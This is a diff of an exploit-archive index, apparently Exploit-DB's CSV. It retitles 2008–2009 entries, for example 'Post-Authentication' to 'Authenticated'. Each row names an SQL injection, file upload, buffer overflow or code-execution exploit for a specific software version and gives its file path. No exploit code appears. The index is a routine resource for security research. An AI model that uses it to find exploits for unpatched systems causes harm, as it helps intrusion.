-5128,7 +5127,7 @@ id,file,description,date,author,platform,type,port 5490,platforms/php/webapps/5490.pl,"YouTube Clone Script - 'spages.php' Remote Code Execution",2008-04-23,Inphex,php,webapps,0 5491,platforms/php/webapps/5491.txt,"Joomla Community Builder 1.0.1 - Blind SQL Injection",2008-04-23,$hur!k'n,php,webapps,0 5492,platforms/windows/local/5492.cpp,"DivX Player 6.7 - '.srt' File Subtitle Parsing Buffer Overflow",2008-04-24,lhoang8500,windows,local,0 -5493,platforms/php/webapps/5493.txt,"Joomla Component JPad 1.0 - Post-Authentication SQL Injection",2008-04-24,His0k4,php,webapps,0 +5493,platforms/php/webapps/5493.txt,"Joomla Component JPad 1.0 - Authenticated SQL Injection",2008-04-24,His0k4,php,webapps,0 5494,platforms/php/webapps/5494.txt,"minibb 2.2 - (Cross-Site Scripting / SQL Injection / Full Path Disclosure) Multiple Vulnerabilities",2008-04-25,girex,php,webapps,0 5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule - (eid) SQL Injection",2008-04-25,Kacper,php,webapps,0 5496,platforms/windows/remote/5496.html,"Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods",2008-04-25,callAX,windows,remote,0 @@ -5228,7 +5227,7 @@ id,file,description,date,author,platform,type,port 5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0 5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0 5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script 05122008 - SQL Injection",2008-05-12,InjEctOr5,php,webapps,0 -5600,platforms/php/webapps/5600.php,"CMS Made Simple 1.2.4 - (FileManager module) File Upload",2008-05-12,EgiX,php,webapps,0 +5600,platforms/php/webapps/5600.php,"CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload",2008-05-12,EgiX,php,webapps,0 5601,platforms/php/webapps/5601.pl,"Advanced Image Hosting (AIH) 2.1 - SQL Injection",2008-05-12,Stack,php,webapps,0 5602,platforms/php/webapps/5602.txt,"AJ HYIP ACME - 'topic_detail.php id' SQL Injection",2008-05-12,InjEctOr5,php,webapps,0 5603,platforms/php/webapps/5603.txt,"EQDKP 1.3.2f - (user_id) Authentication Bypass (PoC)",2008-05-13,vortfu,php,webapps,0 @@ -5336,7 +5335,7 @@ id,file,description,date,author,platform,type,port 5706,platforms/php/webapps/5706.php,"EasyWay CMS - 'index.php mid' SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0 5707,platforms/php/webapps/5707.txt,"Social Site Generator - (path) Remote File Inclusion",2008-05-31,vBmad,php,webapps,0 5708,platforms/php/webapps/5708.txt,"Joomla Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,php,webapps,0 -5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC (Post-Authentication)",2008-05-31,securfrog,windows,dos,0 +5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated)",2008-05-31,securfrog,windows,dos,0 5710,platforms/php/webapps/5710.pl,"Joomla Component com_biblestudy 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,php,webapps,0 5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0 5712,platforms/multiple/dos/5712.pl,"Samba (client) - receive_smb_raw() Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0 @@ -5376,7 +5375,7 @@ id,file,description,date,author,platform,type,port 5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate - (user) SQL Injection",2008-06-05,His0k4,php,webapps,0 5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0 -5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Post-Authentication) Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22 +5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22 5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0 5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection",2008-06-08,Zigma,asp,webapps,0 5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0 @@ -5439,7 +5438,7 @@ id,file,description,date,author,platform,type,port 5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injections",2008-06-14,"CWH Underground",php,webapps,0 5812,platforms/php/webapps/5812.txt,"PHPMyCart - 'shop.php cat' SQL Injection",2008-06-14,anonymous,php,webapps,0 5813,platforms/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - (page) Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0 -5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Post-Authentication Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0 +5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0 5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - (prodId) Blind SQL Injection",2008-06-14,anonymous,php,webapps,0 5816,platforms/php/webapps/5816.pl,"DIY - (index_topic did) Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0 5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,windows,dos,0 @@ -5589,7 +5588,7 @@ id,file,description,date,author,platform,type,port 5965,platforms/php/webapps/5965.txt,"Joomla Component beamospetition - SQL Injection",2008-06-28,His0k4,php,webapps,0 5966,platforms/php/webapps/5966.pl,"Joomla Component Xe webtv - 'id' Blind SQL Injection",2008-06-28,His0k4,php,webapps,0 5967,platforms/php/webapps/5967.txt,"SebracCMS 0.4 - Multiple SQL Injections",2008-06-28,shinmai,php,webapps,0 -5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 - Post-Authentication IMAP Remote Buffer Overflow Denial of Service",2008-06-30,"Travis Warren",windows,dos,0 +5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service",2008-06-30,"Travis Warren",windows,dos,0 5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - (pow) SQL Injection",2008-06-30,anonymous,php,webapps,0 5970,platforms/php/webapps/5970.txt,"eSHOP100 - (SUB) SQL Injection",2008-06-30,JuDge,php,webapps,0 5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin",2008-06-30,"CWH Underground",php,webapps,0 @@ -5710,14 +5709,14 @@ id,file,description,date,author,platform,type,port 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0 6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - (PHPHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0 -6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - (Post-Authentication) Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0 +6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0 6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0 6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0 6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps,0 6099,platforms/php/webapps/6099.txt,"Siteframe - 'folder.php id' SQL Injection",2008-07-18,n0ne,php,webapps,0 6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows/x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80 -6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Pre-Authentication Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0 +6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",windows,dos,0 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 @@ -5998,7 +5997,7 @@ id,file,description,date,author,platform,type,port 6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0 6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0 6416,platforms/php/webapps/6416.txt,"Libera CMS 1.12 - 'cookie' SQL Injection",2008-09-10,StAkeR,php,webapps,0 -6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - (Post-Authentication) (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 +6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0 6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0 @@ -6090,7 +6089,7 @@ id,file,description,date,author,platform,type,port 6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - (singerid) SQL Injection",2008-09-21,"Hussin X",php,webapps,0 6512,platforms/php/webapps/6512.txt,"Diesel Job Site - (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0 6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps,0 -6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - (Post-Authentication) File Upload",2008-09-21,InjEctOr5,php,webapps,0 +6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0 6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service",2008-09-21,"NT Internals",windows,dos,0 6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0 6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 @@ -6233,8 +6232,8 @@ id,file,description,date,author,platform,type,port 6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0 6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0 -6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - (Post-Authentication) (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0 -6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - (Post-Authentication) Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0 +6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0 +6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - (Authenticated) Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0 6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0 6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0 6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0 @@ -6270,7 +6269,7 @@ id,file,description,date,author,platform,type,port 6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 6697,platforms/php/webapps/6697.txt,"Built2Go PHP Realestate 1.5 - (event_detail.php) SQL Injection",2008-10-07,d3v1l,php,webapps,0 6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,php,webapps,0 -6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site File Upload Attack (PoC)",2008-10-08,Nine:Situations:Group,windows,remote,0 +6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Attack (PoC)",2008-10-08,Nine:Situations:Group,windows,remote,0 6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API (Data Feed File) - Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0 6701,platforms/php/webapps/6701.txt,"HispaH textlinksads - 'index.php' SQL Injection",2008-10-08,InjEctOr5,php,webapps,0 6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - (campaignId) SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0 @@ -6290,7 +6289,7 @@ id,file,description,date,author,platform,type,port 6716,platforms/windows/dos/6716.pl,"Microsoft Windows GDI+ - PoC (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0 6717,platforms/windows/dos/6717.py,"WinFTP 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0 6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 - (load) Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0 -6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - (POP3) Pre-Authentication Denial of Service",2008-10-10,rAWjAW,windows,dos,0 +6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service",2008-10-10,rAWjAW,windows,dos,0 6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - (linkid) SQL Injection (tr)",2008-10-10,Crackers_Child,asp,webapps,0 6721,platforms/php/webapps/6721.txt,"Easynet4u Forum Host - 'forum.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php faq' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 @@ -6369,18 +6368,18 @@ id,file,description,date,author,platform,type,port 6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0 6798,platforms/windows/local/6798.pl,"VLC Media Player - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0 6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) SQL Injection",2008-10-21,"Hussin X",php,webapps,0 -6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Post-Authentication) SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0 +6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0 6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0 6802,platforms/php/webapps/6802.txt,"Joomla Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps,0 6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0 6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22 6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0 6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0 -6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (Post-Authentication) (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0 +6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0 6809,platforms/php/webapps/6809.txt,"Joomla Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0 6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0 6811,platforms/php/webapps/6811.txt,"YDC - 'kdlist.php cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0 -6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Post-Authentication) SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0 +6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0 6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",windows,remote,0 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0 6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0 @@ -6649,7 +6648,7 @@ id,file,description,date,author,platform,type,port 7084,platforms/php/webapps/7084.txt,"PHPStore Complete Classifieds Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0 7085,platforms/php/webapps/7085.txt,"PHPStore Real Estate - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0 7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script - (DB) Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0 -7087,platforms/php/webapps/7087.txt,"AJ Auction Authentication - Bypass Exploit",2008-11-10,G4N0K,php,webapps,0 +7087,platforms/php/webapps/7087.txt,"AJ Auction - Authentication Bypass",2008-11-10,G4N0K,php,webapps,0 7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos,0 7089,platforms/php/webapps/7089.txt,"Aj Classifieds - Authentication Bypass",2008-11-11,G4N0K,php,webapps,0 7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0 @@ -6928,7 +6927,7 @@ id,file,description,date,author,platform,type,port 7380,platforms/php/webapps/7380.txt,"XOOPS 2.3.1 - Multiple Local File Inclusion",2008-12-08,DSecRG,php,webapps,0 7381,platforms/php/webapps/7381.txt,"siu guarani - Multiple Vulnerabilities",2008-12-08,"Ubik & proudhon",php,webapps,0 7382,platforms/php/webapps/7382.txt,"phpMyAdmin 3.1.0 - (Cross-Site Request Forgery) SQL Injection",2008-12-08,"Michael Brooks",php,webapps,0 -7383,platforms/php/webapps/7383.txt,"Simple Directory Listing 2 - Cross-Site File Upload",2008-12-08,"Michael Brooks",php,webapps,0 +7383,platforms/php/webapps/7383.txt,"Simple Directory Listing 2 - Cross-Site Arbitrary File Upload",2008-12-08,"Michael Brooks",php,webapps,0 7384,platforms/windows/remote/7384.txt,"XAMPP 1.6.8 - (Cross-Site Request Forgery) Change Administrative Password Exploit",2008-12-08,"Michael Brooks",windows,remote,0 7385,platforms/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection",2008-12-08,Cnaph,php,webapps,0 7386,platforms/php/webapps/7386.pl,"phpBB 3 - (Mod Tag Board 4) Blind SQL Injection",2008-12-08,StAkeR,php,webapps,0 @@ -7052,7 +7051,7 @@ id,file,description,date,author,platform,type,port 7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - (index.php menuID) SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0 7507,platforms/php/webapps/7507.pl,"Lizardware CMS 0.6.0 - Blind SQL Injection",2008-12-17,StAkeR,php,webapps,0 7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - 'QuickerSite.mdb' Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0 -7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary PHP File Upload",2008-12-18,Pouya_Server,php,webapps,0 +7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary .PHP File Upload",2008-12-18,Pouya_Server,php,webapps,0 7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0 7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Login Bypass",2008-12-18,StAkeR,php,webapps,0 7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution",2008-12-18,StAkeR,php,webapps,0 @@ -7178,7 +7177,7 @@ id,file,description,date,author,platform,type,port 7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0 7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - (filter.php) Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0 7637,platforms/windows/dos/7637.pl,"Elecard MPEG Player 5.5 - '.m3u' Stack Buffer Overflow (PoC)",2009-01-01,"aBo MoHaMeD",windows,dos,0 -7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote PHP File Upload",2009-01-01,Lo$er,php,webapps,0 +7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote Arbitrary .PHP File Upload",2009-01-01,Lo$er,php,webapps,0 7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0 7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - (Authentication Bypass) SQL Injection",2009-01-01,DNX,php,webapps,0 7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - (news.php newsid) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 @@ -7412,7 +7411,7 @@ id,file,description,date,author,platform,type,port 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0 7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'show_cat2.php grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0 -7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - 'LIST' Post-Authentication Remote Buffer Overflow",2009-01-26,"joe walko",windows,remote,21 +7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow",2009-01-26,"joe walko",windows,remote,21 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - ''Username'' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0 7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0 @@ -7444,7 +7443,7 @@ id,file,description,date,author,platform,type,port 7905,platforms/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution",2009-01-29,darkjoker,php,webapps,0 7906,platforms/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)",2009-01-29,Stack,windows,dos,0 7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0 -7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote PHP File Upload",2009-01-29,"Michael Brooks",php,webapps,0 +7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote Arbitrary .PHP File Upload",2009-01-29,"Michael Brooks",php,webapps,0 7910,platforms/windows/remote/7910.html,"WOW Web On Windows ActiveX Control 2 - Remote Code Execution",2009-01-29,"Michael Brooks",windows,remote,0 7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps,0 7912,platforms/windows/remote/7912.txt,"Microsoft Internet Explorer 7 - Clickjacking",2009-01-29,UzmiX,windows,remote,0 @@ -7516,7 +7515,7 @@ id,file,description,date,author,platform,type,port 7982,platforms/asp/webapps/7982.txt,"team 1.x - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0 7985,platforms/windows/dos/7985.pl,"Novell Groupwise 8.0 - Malformed RCPT command Off-by-One Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0 -7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - (Authorization) Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",windows,dos,0 +7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",windows,dos,0 7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - (Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities",2009-02-04,JosS,php,webapps,0 7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows XP)",2009-02-04,"Rob Carter",windows,remote,0 7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows Vista)",2009-02-04,"Rob Carter",windows,remote,0 @@ -7528,7 +7527,7 @@ id,file,description,date,author,platform,type,port 7995,platforms/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)",2009-02-05,"Praveen Darshanam",windows,dos,0 7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0 7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0 -7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0 +7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,php,webapps,0 @@ -7578,7 +7577,7 @@ id,file,description,date,author,platform,type,port 8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - (query) SQL Injection",2009-02-11,Osirys,php,webapps,0 8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - (viewer.php id) SQL Injection",2009-02-12,x0r,php,webapps,0 8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0 